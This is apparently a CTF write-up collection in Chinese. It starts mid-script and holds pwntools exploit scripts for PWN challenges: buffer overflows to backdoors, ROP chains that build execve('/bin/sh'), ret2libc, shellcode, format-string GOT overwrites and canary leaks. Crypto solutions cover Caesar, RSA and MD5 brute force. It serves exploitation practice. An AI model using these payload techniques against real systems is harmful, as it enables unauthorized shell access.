libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
case 3: #19.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
case 4: #20.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')
def debug():
gdb.attach(io)
pause()
#----------------------------------------------------------
#调试
#gdb.attach(io,'b *$rebase(0x1466)') #断点调试/PIE调试
#gdb.attach(io) #程序调试
#----------------------------------------------------------
backdoor = 0x4015E4
payload = b'\x00'+ b'a' * (0x31 + 0x08) + p64(backdoor)
io.sendlineafter('>',payload)
#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()
[WEEK1]猜数游戏
先对源码简单分析一下,主要考点是伪随机数
我们需要先发送一个数字作为第二个输入字符串的长度,直接发送最大长度11,然后利用python调用C语言来计算随机数,多次尝试获取shell
from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time
context(os='linux', arch='amd64', log_level='debug')
local = 4
if(local == 0): #本地练习
io = process('./pwn')
elif(local == 1): #比赛本地方便替换
io = process('/home/yu/CTF/PWN/guess')
elif(local == 2): #NSSCTF
io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3): #BUUCTF
io = remote('node4.buuoj.cn',28067)
else: #比赛远程
io = remote('112.6.51.212',32573)
elfnum = 1
if(elfnum == 0): #日常练习
elf = ELF('./pwn')
else: #比赛方便更换
elf = ELF('/home/yu/CTF/PWN/guess')
chooselibc = 1
pwnlibc = 1
match chooselibc:
case 0:
if(pwnlibc == 0): #其他版本
libc = ELF('/home/yu/CTF/PWN/Libc/libc.so.6')
else: #本地
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
case 1: #16.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
case 2: #18.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
case 3: #19.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
case 4: #20.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')
def debug():
gdb.attach(io)
pause()
#----------------------------------------------------------
#调试
#gdb.attach(io,'b *$rebase(0x1466)') #断点调试/PIE调试
#gdb.attach(io) #程序调试
#----------------------------------------------------------
my_libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
my_libc.srand(my_libc.time(0))
v4 = str(my_libc.rand())
io.sendlineafter('number?',str(11))
io.sendline(v4)
#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()
[WEEK1]hard nc
同样是nc直接连,但是出题人利用linux命令的特性,将部分flag放在了特殊文件中
利用ls -a查看所有文件,查看.gift,可以得到前半段
在更换到gift2目录中,查看flag2,可以得到一串base64
厨子解密,拼接即可获得完整flag
[WEEK1]ropchain
使用ROPgatget命令自动生成一个ROP链
Ropgadget --binary 附件名 --ropchain
补充偏移,直接利用
from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time
context(os='linux', arch='amd64', log_level='debug')
local = 4
if(local == 0): #本地练习
io = process('./pwn')
elif(local == 1): #比赛本地方便替换
io = process('')
elif(local == 2): #NSSCTF
io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3): #BUUCTF
io = remote('node4.buuoj.cn',28067)
else: #比赛远程
io = remote('112.6.51.212',32540)
elfnum = 0
if(elfnum == 0): #日常练习
elf = ELF('./pwn')
else: #比赛方便更换
elf = ELF('')
chooselibc = 1
pwnlibc = 1
match chooselibc:
case 0:
if(pwnlibc == 0): #其他版本
libc = ELF('/home/yu/CTF/PWN/Libc/libc.so.6')
else: #本地
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
case 1: #16.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
case 2: #18.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
case 3: #19.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
case 4: #20.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')
def debug():
gdb.attach(io)
pause()
#----------------------------------------------------------
#调试
#gdb.attach(io,'b *$rebase(0x1466)') #断点调试/PIE调试
#gdb.attach(io) #程序调试
#----------------------------------------------------------
p = b'a' * 0x28
p += pack('<Q', 0x000000000040a30d) # pop rsi ; ret
p += pack('<Q', 0x000000000049d0c0) # @ .data
p += pack('<Q', 0x0000000000419a1c) # pop rax ; ret
p += b'/bin//sh'
p += pack('<Q', 0x000000000041ac41) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040a30d) # pop rsi ; ret
p += pack('<Q', 0x000000000049d0c8) # @ .data + 8
p += pack('<Q', 0x0000000000417e25) # xor rax, rax ; ret
p += pack('<Q', 0x000000000041ac41) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000401d1d) # pop rdi ; ret
p += pack('<Q', 0x000000000049d0c0) # @ .data
p += pack('<Q', 0x000000000040a30d) # pop rsi ; ret
p += pack('<Q', 0x000000000049d0c8) # @ .data + 8
p += pack('<Q', 0x0000000000401858) # pop rdx ; ret
p += pack('<Q', 0x000000000049d0c8) # @ .data + 8
p += pack('<Q', 0x0000000000417e25) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000401243) # syscall
io.send(p)
#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()
[WEEK1]口算题
pwntools的基本使用方法,利用爆破获取flag
from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time
context(os='linux', arch='amd64', log_level='debug')
local = 4
if(local == 0): #本地练习
io = process('./pwn')
elif(local == 1): #比赛本地方便替换
io = process('')
elif(local == 2): #NSSCTF
io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3): #BUUCTF
io = remote('node4.buuoj.cn',28067)
else: #比赛远程
io = remote('112.6.51.212',32543)
elfnum = 0
if(elfnum == 0): #日常练习
elf = ELF('./pwn')
else: #比赛方便更换
elf = ELF('')
chooselibc = 1
pwnlibc = 1
match chooselibc:
case 0:
if(pwnlibc == 0): #其他版本
libc = ELF('/home/yu/CTF/PWN/Libc/libc.so.6')
else: #本地
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
case 1: #16.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
case 2: #18.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
case 3: #19.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
case 4: #20.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')
def debug():
gdb.attach(io)
pause()
#----------------------------------------------------------
#调试
#gdb.attach(io,'b *$rebase(0x1466)') #断点调试/PIE调试
#gdb.attach(io) #程序调试
#----------------------------------------------------------
io.send(b'\n')
io.recv()
io.recv()
a = int(io.recvuntil(' ',drop=True))
b = str(io.recvuntil(' ',drop=True),encoding='utf-8')
c = int(io.recvuntil(' ',drop=True))
if b == '+':
io.sendline(str(a + c))
elif b == '-':
io.sendline(str(a - c))
elif b == '×':
io.sendline(str(a * c))
elif b == '**':
io.sendline(str(a ** c))
elif b == '%':
io.sendline(str(a % c))
else:
io.sendline(str(a / c))
while(1):
io.recvline()
io.recvline()
io.recvline()
a = int(io.recvuntil(' ',drop=True))
b = str(io.recvuntil(' ',drop=True),encoding='utf-8')
c = int(io.recvuntil(' ',drop=True))
if b == '+':
io.sendline(str(a + c))
elif b == '-':
io.sendline(str(a - c))
elif b == '×':
io.sendline(str(a * c))
elif b == '**':
io.sendline(str(a ** c))
elif b == '%':
io.sendline(str(a % c))
else:
io.sendline(str(a / c))
#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()
[WEEK1]babystack
其他师傅用的好像是ret2syscall,我用的ret2libc,没有什么特别的,基础的ret2libc,但是这里利用的是write函数来读写
from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time
context(os='linux', arch='amd64', log_level='debug')
local = 4
if(local == 0): #本地练习
io = process('./pwn')
elif(local == 1): #比赛本地方便替换
io = process('/home/yu/CTF/PWN/babystack')
elif(local == 2): #NSSCTF
io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3): #BUUCTF
io = remote('node4.buuoj.cn',28067)
else: #比赛远程
io = remote('112.6.51.212',32570)
elfnum = 1
if(elfnum == 0): #日常练习
elf = ELF('./pwn')
else: #比赛方便更换
elf = ELF('/home/yu/CTF/PWN/babystack')
chooselibc = 1
pwnlibc = 1
match chooselibc:
case 0:
if(pwnlibc == 0): #其他版本
libc = ELF('/home/yu/CTF/PWN/Libc/libc.so.6')
else: #本地
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
case 1: #16.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
case 2: #18.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
case 3: #19.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
case 4: #20.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')
def debug():
gdb.attach(io)
pause()
#----------------------------------------------------------
#调试
#gdb.attach(io,'b *$rebase(0x1466)') #断点调试/PIE调试
#gdb.attach(io) #程序调试
#----------------------------------------------------------
ret = 0x400581
rdi = 0x400833
rsi = 0x400831
w_plt = elf.plt['write']
w_got = elf.got['write']
sys = 0x4007AE
main = elf.sym['vuln']
payload = b'a' * 0x28 + p64(ret) + p64(rdi) + p64(1) + p64(rsi) + p64(w_got) + p64(0) + p64(w_plt) + p64(main)
io.sendlineafter('it',payload)
ret_addr = u64(io.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
base = ret_addr - libc.sym['write']
binsh = base + next(libc.search(b'/bin/sh\x00'))
payload1 = b'a' * 0x28 + p64(rdi) + p64(binsh) + p64(sys)
io.send(payload1)
#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()
[WEEK1]showshowway
分析我们可知,当y和p值相等时,我们就可以获取shell,我们输入的值会存放带bss段中,y是溢出之后填充的值,p的值为showshowway
这样思路就很清晰,我们需要利用垃圾数据将S填充满,然后就会读取剩余部分。S的溢出值为0xFF-0xC0
from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time
context(os='linux', arch='amd64', log_level='debug')
local = 4
if(local == 0): #本地练习
io = process('./pwn')
elif(local == 1): #比赛本地方便替换
io = process('/home/yu/CTF/PWN/showshowway')
elif(local == 2): #NSSCTF
io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3): #BUUCTF
io = remote('node4.buuoj.cn',28067)
else: #比赛远程
io = remote('112.6.51.212',32565)
elfnum = 1
if(elfnum == 0): #日常练习
elf = ELF('./pwn')
else: #比赛方便更换
elf = ELF('/home/yu/CTF/PWN/showshowway')
chooselibc = 1
pwnlibc = 1
match chooselibc:
case 0:
if(pwnlibc == 0): #其他版本
libc = ELF('/home/yu/CTF/PWN/Libc/libc.so.6')
else: #本地
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
case 1: #16.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
case 2: #18.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
case 3: #19.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
case 4: #20.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')
def debug():
gdb.attach(io)
pause()
#----------------------------------------------------------
#调试
#gdb.attach(io,'b *$rebase(0x1466)') #断点调试/PIE调试
#gdb.attach(io) #程序调试
#----------------------------------------------------------
payload = b'a' * 64 + b'showshowway'
io.sendlineafter('try',payload)
#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()
[WEEK1]pkmon
分析一下源码
这里将我们输入的值,存放到0x6010A0的地址中,我们可以通过v1的地址来改变我们的函数利用地址,找到puts函数的got表地址,计算出v1的值,从而调用puts函数来执行跳转到后门函数
from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time
context(os='linux', arch='amd64', log_level='debug')
local = 4
if(local == 0): #本地练习
io = process('./pwn')
elif(local == 1): #比赛本地方便替换
io = process('/home/yu/CTF/PWN/pkmon')
elif(local == 2): #NSSCTF
io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3): #BUUCTF
io = remote('node4.buuoj.cn',28067)
else: #比赛远程
io = remote('112.6.51.212',32578)
elfnum = 1
if(elfnum == 0): #日常练习
elf = ELF('./pwn')
else: #比赛方便更换
elf = ELF('/home/yu/CTF/PWN/pkmon')
chooselibc = 1
pwnlibc = 1
match chooselibc:
case 0:
if(pwnlibc == 0): #其他版本
libc = ELF('/home/yu/CTF/PWN/Libc/libc.so.6')
else: #本地
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
case 1: #16.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
case 2: #18.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
case 3: #19.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
case 4: #20.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')
def debug():
gdb.attach(io)
pause()
#----------------------------------------------------------
#调试
#gdb.attach(io,'b *$rebase(0x1466)') #断点调试/PIE调试
#gdb.attach(io) #程序调试
#----------------------------------------------------------
backdoor = 0x40072B
io.send(b'-17') #(0x18-0XA0)/8
io.send(p64(backdoor))
#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()
[WEEK2]easy_shellcode
基础的shellcode
payload = b'a' * 0x10
io.sendafter('name?',payload)
addr = u64(io.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
print(hex(addr))
shell_addr = addr - 0x80
shellcode = asm(shellcraft.sh()).ljust(0x78,b'a') + p64(shell_addr)
io.sendlineafter('strong',shellcode)
[WEEK2]baby_rop
虽然是静态,但是字符长度太短,只能自己去构造可利用的ROP链
read = 0x805CAF0
edx_ecx_ebx = 0x08049941
eax = 0x080aa06a
int_80 = 0x08049b62
payload = b'a'*(0x1c+4) + p32(read) + p32(edx_ecx_ebx) + p32(0) + p32(0x80e3000) + p32(0x8) + p32(edx_ecx_ebx)+ p32(0) + p32(0) + p32(0x80e3000) + p32(eax) + p32(11) + p32(int_80)
io.send(payload)
sleep(0.1)
io.sendline(b'/bin/sh\x00')
[WEEK2]baby_rop2
使用ROPgadget命令生成ROP链,题目对长度做了限制,浅浅修改一下
p = b'a' * 0x28
p += pack('<Q', 0x000000000040a30d) # pop rsi ; ret
p += pack('<Q', 0x000000000049d0c0) # @ .data
p += pack('<Q', 0x0000000000419a1c) # pop rax ; ret
p += b'/bin//sh'
p += pack('<Q', 0x000000000041ac41) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040a30d) # pop rsi ; ret
p += pack('<Q', 0x000000000049d0c8) # @ .data + 8
p += pack('<Q', 0x0000000000417e25) # xor rax, rax ; ret
p += pack('<Q', 0x000000000041ac41) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000401d1d) # pop rdi ; ret
p += pack('<Q', 0x000000000049d0c0) # @ .data
p += pack('<Q', 0x000000000040a30d) # pop rsi ; ret
p += pack('<Q', 0x000000000049d0c8) # @ .data + 8
p += pack('<Q', 0x0000000000401858) # pop rdx ; ret
p += pack('<Q', 0x000000000049d0c8) # @ .data + 8
p += pack('<Q', 0x0000000000417e25) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += p64(0x419a1c)
p += p64(0x3b)
p += pack('<Q', 0x0000000000401243)
io.send(p)
[WEEK2]string
格式化字符串的利用
ret = 0x40101a
rdi = 0x401343
printf_plt = elf.plt['printf']
printf_got = elf.got['printf']
main = elf.sym['main']
io.sendlineafter('choice:',b'1')
payload = b'%43$p'
io.sendlineafter('message:',payload)
io.recv()
p_addr = int(io.recvuntil('\n',drop=True),16)
print(hex(p_addr))
base = p_addr - 0x24083
print(hex(base))
system = base + libc.sym['system']
payload1 = fmtstr_payload(6,{printf_got: system})
io.sendlineafter('choice:',b'1')
io.sendlineafter('message:',payload1)
io.sendlineafter('choice:',b'1')
io.sendline("/bin/sh\x00")
[WEEK2]原始人,起动
先通过发送yuanshen,qidong!的16进制来绕过第一次判断,随后通过循环发送sh来获取执行shell命令的权限
sleep(0.1)
io.sendline(str(0x6e617579))
sleep(0.1)
io.sendline(str(0x6e656873))
sleep(0.1)
io.sendline(str(0x6469712c))
sleep(0.1)
io.sendline(str(0x21676e6f))
for i in range(0xc):
sleep(0.1)
io.sendline(str(0x68733b)) # ;sh[WEEK2]要买些东西吗
需要修改libc,利用格式化字符串泄露地址
libc = ELF('/home/yu/CTF/PWN/glibc-all-in-one/libs/2.31-0ubuntu9.7_i386/libc-2.31.so')
ret = 0x0804900e
puts_got = elf.got['puts']
main = elf.sym['main']
io.sendlineafter("choice:",b'1')
fmt = b"%15$p.%19$p"
io.sendlineafter("gift",fmt)
io.recv()
canary = int(io.recvuntil(b'.')[:-1], 16)
p_addr = int(io.recvuntil('\n',drop=True),16)
base = p_addr - 0x1aee5
print(hex(base))
system = base + libc.sym['system']
binsh = base + next(libc.search(b'/bin/sh\x00'))
payload1 = b'a'*0x20 + p32(canary) + p32(0)*3 + p32(system) + p32(0) + p32(binsh)
io.sendlineafter("choice:",b'2')
io.sendlineafter('power',payload1)
CRYPTO
学习推荐
古典自己摸索,现代密码b站搜风二西的个人空间-风二西个人主页-哔哩哔哩视频 (bilibili.com)
[WEEK1]立正
先通过凯撒解密,翻转得到一个hint
随后发现密文有似曾相识的地方,像是base64加密,利用flag包裹的经验,将flag{加密
我们可以发现,大括号之然后的任意输入,密文不变的值始终是ZmxhZ3t,随后与题目密文对比,发现大写的字母和数字都发生了偏移,小写字母则不变
由此可知是一个变异的凯撒加密,编写脚本得到base64的真正密文,解密得到flag
def decrypt_string(s):
result = ""
for c in s:
if c.isupper():
# 大写字母,加上 21
ascii_val = ord(c) + 21
if ascii_val > ord('Z'):
ascii_val -= 26
result += chr(ascii_val)
elif c.isdigit():
# 数字,减去 5
num_val = int(c) - 5
if num_val < 0:
num_val += 10
result += str(num_val)
else:
# 小写字母,保持不变
result += c
return result
encrypted_string = "EmxhE8tERKAfYAZ6S636dIWuEK46ZK4yRBdNdK4uRKd4"
decrypted_string = decrypt_string(encrypted_string)
print("Decrypted String:", decrypted_string)
# ZmxhZ3tZMFVfTVU1N181dDRuZF91UF9yMWdIdF9uMFd9
[WEEK1]Crypto_Checkin
Toolsfx一把梭
[WEEK1]残缺的md5
看到md5,直接爆破
import hashlib
strings = ["f0af", "b1f463", "f7ae", "b2ac4e6"]
def crack_md5(md5_str):
for s in strings:
if s not in md5_str:
return False
return True
def brute_force_question_mark():
for c1 in range(32,128):
for c2 in range(32,128):
for c3 in range(32,128):
password = "KCLWG" + chr(c1) + "K8M9O3" + chr(c2) + "DE" + chr(c3) + "84S9"
md5_hash = hashlib.md5(password.encode()).hexdigest()
if crack_md5(md5_hash):
print("Found password: ", password)
return
print("Password not found!")
brute_force_question_mark()
#KCLWGXK8M9O3KDED84S9将最后的值md5加密就是flag
[WEEK1]凯撒大帝
凯撒解密
[WEEK1]进制
厨子一把梭
[WEEK1]okk
ook解密
Brainfuck/Ook! Obfuscation/Encoding [splitbrain.org]
[WEEK1]熊斐特
通过百度可知是埃特巴什码,找在线工具一把梭
CTF在线工具-在线埃特巴什码加密|在线埃特巴什码解密|埃特巴什码算法|Atbash Cipher (hiencode.com)
[WEEK1]佛说:只能四天
先用toolsfx对密文进行解密,得到一串社会主义编码的密文
对密文进行解密得到一段16进制的密文,但16进制解密解不出来,猜测还有其他加密方式,第一组是f的16进制,第二则不是l,猜测是栅栏加凯撒,最后再解16进制得到flag
[WEEK1]黑暗之歌
先对盲文解密,可以得到一串base64密文
盲文点字加密/解密 - 一个工具箱 - 好用的在线工具都在这里! (atoolbox.net)
再使用toolsfx解密得到一串音符密文
最后再使用对音符密文解密得到flag
文本加密为音乐符号,可自设密码|文本在线加密解密工具 (qqxiuzi.cn)
[WEEK1]迷雾重重
随波逐流一把梭(需要注意的是,随波逐流解出来的一般都是大写,flag需要自己尝试是大写或者小写)
[WEEK1]难言的遗憾
百度可知是中文电话编码,找到在线网站,解密即可
中文电码查询 - 中文电码转换 - 中文电码对照表 (bmcx.com)
[WEEK1]小兔子可爱捏
根据题目名可知是rabbit加密,附件描述密钥为宇宙的终极答案是什么?百度可知为42(U2F开头的密文就是rabbit加密的特征)
在线Rabbit加密 | Rabbit解密- 在线工具 (sojson.com)
[WEEK1]电信诈骗
根据题目描述,得知用到了rot47加密和一个异或50,再根据将vivo50作为启动资金,所以需要先异或再进行rot47
def rot47(s):
result = ""
for c in s:
if ord(c) >= 33 and ord(c) <= 126:
result += chr((ord(c) - 33 + 47) % 94 + 33)
else:
result += c
return result
num_str = '050f000a7e407151537802540b747176075178027552756d0256726262627c'
num_list = [int(num_str[i:i+2], 16) for i in range(0, len(num_str), 2)] # 将十六进制字符串转换为整数列表
xor_num = 50 # 异或的数值
result_list = [n ^ xor_num for n in num_list] # 对列表中每一个元素进行异或操作
result_str = ''.join([chr(n) for n in result_list]) # 将 ASCII 码转换为对应字符
decrypted_str = rot47(result_str) # 使用 ROT47 解密
print(decrypted_str)
# flag{Cr42y_7hursd4y_v1v0_5o!!!}[WEEK1]what is m
RSA的转码基础
from Crypto.Util.number import *
import libnum
import gmpy2
m = 7130439814057451283002229060880745915743212367553316633039885127247454927505647160409797437959928750181505482768571735220283256353309876617079765282458332035915105679413106241223170191475581
print(long_to_bytes(m))
# flag{TheR3_ARE_sEvERal_4lTeRna7iVE5_To_ThE_IOn9_T0_8y7es_1UNCTioN_E0D2gI9AoacC}[WEEK1]really_ez_rsa
基础的RSA
from Crypto.Util.number import *
import libnum
import gmpy2
p = 217873395548207236847876059475581824463
q = 185617189161086060278518214521453878483
c = 6170206647205994850964798055359827998224330552323068751708721001188295410644
e = 65537
n = p * q
phi = (p - 1) * (q - 1)
d = gmpy2.invert(e,phi)
m = pow(c,d,n)
print(long_to_bytes(m))
# flag{Y0ung_meiyou_xiaojj}[WEEK2]ez_rsa
先使用共模得到后半段flag,随后使用yafu对n进行分解得到一个数组
import gmpy2
import libnum
from Crypto.Util.number import *
from sympy import mod_inverse
c = 28535916699190273475273097091422420145718978597126134891571109006456944397344856577421369324831702083810238921719657496747722337086131545474384253288151783029981352196506749672783866527948391034258269669654392993063423671431837882584570973320095601407578443348352802850496429240170710269529489900871208384711844617081275862971410246759090936379744946527813691945129059991795202769186014306943707223831130752782380563227353615164053563120572722464543812139164048342504963081408349934180883607554389607335607410546630525512019818062185681153477671373000186961748278118124044645584490544698827467815360888525822167
